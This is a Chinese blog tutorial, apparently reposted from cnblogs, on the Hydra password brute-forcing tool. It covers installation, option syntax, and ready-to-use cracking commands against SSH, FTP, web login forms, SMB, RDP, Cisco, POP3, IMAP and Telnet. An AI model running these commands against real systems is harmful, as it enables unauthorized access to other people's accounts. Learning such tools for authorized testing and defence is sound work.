Linux下暴力破解工具Hydra详解
Linux下暴力破解工具Hydra詳解
一、簡介
Number one of the biggest security holes are passwords, as every password security study shows. Hydra is a parallized login cracker which supports numerous protocols to attack. New modules are easy to add, beside that, it is flexible and very fast.
Hydra was tested to compile on Linux, Windows/Cygwin, Solaris 11, FreeBSD 8.1 and OSX, and is made available under GPLv3 with a special OpenSSL license expansion.
Currently this tool supports:?
AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP, SOCKS5, SSH (v1 and v2), Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.
For HTTP, POP3, IMAP and SMTP, several login mechanisms like plain and MD5 digest etc. are supported.
This tool is a proof of concept code, to give researchers and security consultants the possiblity to show how easy it would be to gain unauthorized access from remote to a system.
The program is maintained by van Hauser and David Maciejak.
The Hackers Choice?
http://www.thc.org/thc-hydra
一、簡介
Number one of the biggest security holes are passwords, as every password security study shows. Hydra is a parallized login cracker which supports numerous protocols to attack. New modules are easy to add, beside that, it is flexible and very fast.
Hydra was tested to compile on Linux, Windows/Cygwin, Solaris 11, FreeBSD 8.1 and OSX, and is made available under GPLv3 with a special OpenSSL license expansion.
Currently this tool supports:?
AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP, SOCKS5, SSH (v1 and v2), Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.
For HTTP, POP3, IMAP and SMTP, several login mechanisms like plain and MD5 digest etc. are supported.
This tool is a proof of concept code, to give researchers and security consultants the possiblity to show how easy it would be to gain unauthorized access from remote to a system.
The program is maintained by van Hauser and David Maciejak.
The Hackers Choice?
http://www.thc.org/thc-hydra
二、安裝
1、安裝相關(guān)依賴包
- Ubuntu/Debian
- apt-get install libssl-dev libssh-dev libidn11-dev libpcre3-dev libgtk2.0-dev libmysqlclient-dev libpq-dev libsvn-dev firebird2.1-dev libncp-dev libncurses5-dev hydra
Debian和Ubuntu發(fā)行版,源里自帶hydra,直接用apt-get在線安裝。
- Redhat/Fedora
- yum install openssl-devel pcre-devel ncpfs-devel postgresql-devel libssh-devel subversion-devel libncurses-devel
- OpenSuSE
- zypper install libopenssl-devel pcre-devel libidn-devel ncpfs-devel libssh-devel postgresql-devel subversion-devel libncurses-devel
本實驗用的是?CentOS release 5.6 (Final),執(zhí)行yum install 后相關(guān)依賴包安裝情況如下:
? ? ? ? ?
? ? ? ? ?
2、Hydra 安裝
# wget http://www.thc.org/releases/hydra-7.4.1.tar.gz # tar zxvf hydra-7.4.1.tar.gz # cd hydra-7.4.1 # ./configure # make && make install# ./configure 會檢測當(dāng)前系統(tǒng)一些組件配置,主要是對于破解支持模塊的檢測,可根據(jù)需要安裝對應(yīng)的支持庫和依賴包。
?
# make
?# make install
三、Syntax
?
# hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV] server service [OPT]-R
繼續(xù)從上一次進度接著破解
-S
大寫,采用SSL鏈接
-s <PORT>
小寫,可通過這個參數(shù)指定非默認端口
-l <LOGIN>
指定破解的用戶,對特定用戶破解
-L <FILE>
指定用戶名字典
-p <PASS>
小寫,指定密碼破解,少用,一般是采用密碼字典
-P <FILE>
大寫,指定密碼字典
-e <ns>
可選選項,n:空密碼試探,s:使用指定用戶和密碼試探
-C <FILE>
使用冒號分割格式,例如“登錄名:密碼”來代替-L/-P參數(shù)
-M <FILE>
指定目標(biāo)列表文件一行一條
-o <FILE>
指定結(jié)果輸出文件
-f
在使用-M參數(shù)以后,找到第一對登錄名或者密碼的時候中止破解
-t <TASKS>
同時運行的線程數(shù),默認為16
-w <TIME>
設(shè)置最大超時的時間,單位秒,默認是30s
-v / -V
顯示詳細過程
server
目標(biāo)ip
service
指定服務(wù)名,支持的服務(wù)和協(xié)議:telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt http[s]-{head|get} http-{get|post}-form http-proxy cisco cisco-enable vnc ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5 rexec rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh2 smtp-auth[-ntlm] pcanywhere teamspeak sip vmauthd firebird ncp afp等等
OPT
可選項
四、實例
1、手動創(chuàng)建用戶名字典和密碼字典,這里只是為了演示,只加了幾個用戶名和弱口令。真正破解時,需要利用密碼字典生成器生成強大的字典。?
?
2、破解ssh:
# hydra -L users.txt -P password.txt -t 1 -vV -e ns 192.168.1.104 ssh
破解成功,直接顯示結(jié)果。
也可以使用 -o 選項指定結(jié)果輸出文件。
# hydra -L users.txt -P password.txt -t 1 -vV -e ns -o save.log 192.168.1.104 ssh
五、其他類型密碼破解
- 破解ftp:
- # hydra ip ftp -l 用戶名 -P 密碼字典 -t 線程(默認16) -vV # hydra ip ftp -l 用戶名 -P 密碼字典 -e ns -vV
- get方式提交,破解web登錄:
- # hydra -l 用戶名 -p 密碼字典 -t 線程 -vV -e ns ip http-get /admin/# hydra -l 用戶名 -p 密碼字典 -t 線程 -vV -e ns -f ip http-get /admin/index.php
- post方式提交,破解web登錄:
- 該軟件的強大之處就在于支持多種協(xié)議的破解,同樣也支持對于web用戶界面的登錄破解,get方式提交的表單比較簡單,這里通過post方式提交密碼破解提供思路。該工具有一個不好的地方就是,如果目標(biāo)網(wǎng)站登錄時候需要驗證碼就無法破解了。帶參數(shù)破解如下:
- <form action="index.php" method="POST">
<input type="text" name="name" /><BR><br>
<input type="password" name="pwd" /><br><br>
<input type="submit" name="sub" value="提交">
</form>
假設(shè)有以上一個密碼登錄表單,我們執(zhí)行命令:
- # hydra -l admin -P pass.lst -o ok.lst -t 1 -f 127.0.0.1 http-post-form “index.php:name=^USER^&pwd=^PASS^:<title>invalido</title>”
說明:破解的用戶名是admin,密碼字典是pass.lst,破解結(jié)果保存在ok.lst,-t 是同時線程數(shù)為1,-f 是當(dāng)破解了一個密碼就停止,ip 是本地,就是目標(biāo)ip,http-post-form表示破解是采用http 的post 方式提交的表單密碼破解。
后面參數(shù)是網(wǎng)頁中對應(yīng)的表單字段的name 屬性,后面<title>中的內(nèi)容是表示錯誤猜解的返回信息提示,可以自定義。
- 破解https:
- # hydra -m /index.php -l muts -P pass.txt 10.36.16.18 https
- 破解teamspeak:
- # hydra -l 用戶名 -P 密碼字典 -s 端口號 -vV ip teamspeak
- 破解cisco:
- # hydra -P pass.txt 10.36.16.18 cisco # hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable
- 破解smb:
- # hydra -l administrator -P pass.txt 10.36.16.18 smb
- 破解pop3:
- # hydra -l muts -P pass.txt my.pop3.mail pop3
- 破解rdp:
- # hydra ip rdp -l administrator -P pass.txt -V
- 破解http-proxy:
- # hydra -l admin -P pass.txt http-proxy://10.36.16.18
- 破解imap:
- # hydra -L user.txt -p secret 10.36.16.18 imap PLAIN # hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN
- 破解telnet
- # hydra ip telnet -l 用戶 -P 密碼字典 -t 32 -s 23 -e ns -f -V
?
- 六、總結(jié)
- 此工具強大之處遠多于以上測試,其密碼能否破解關(guān)鍵在于強大的字典,對于社工型滲透來說,有時能夠得到事半功倍的效果。
轉(zhuǎn)載于:https://www.cnblogs.com/liuyansheng/p/6346598.html
總結(jié)
以上是生活随笔為你收集整理的Linux下暴力破解工具Hydra详解的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: ug用户默认设置只读(ug用户默认设置只
- 下一篇: 怎么精简电脑系统软件(自己精简系统)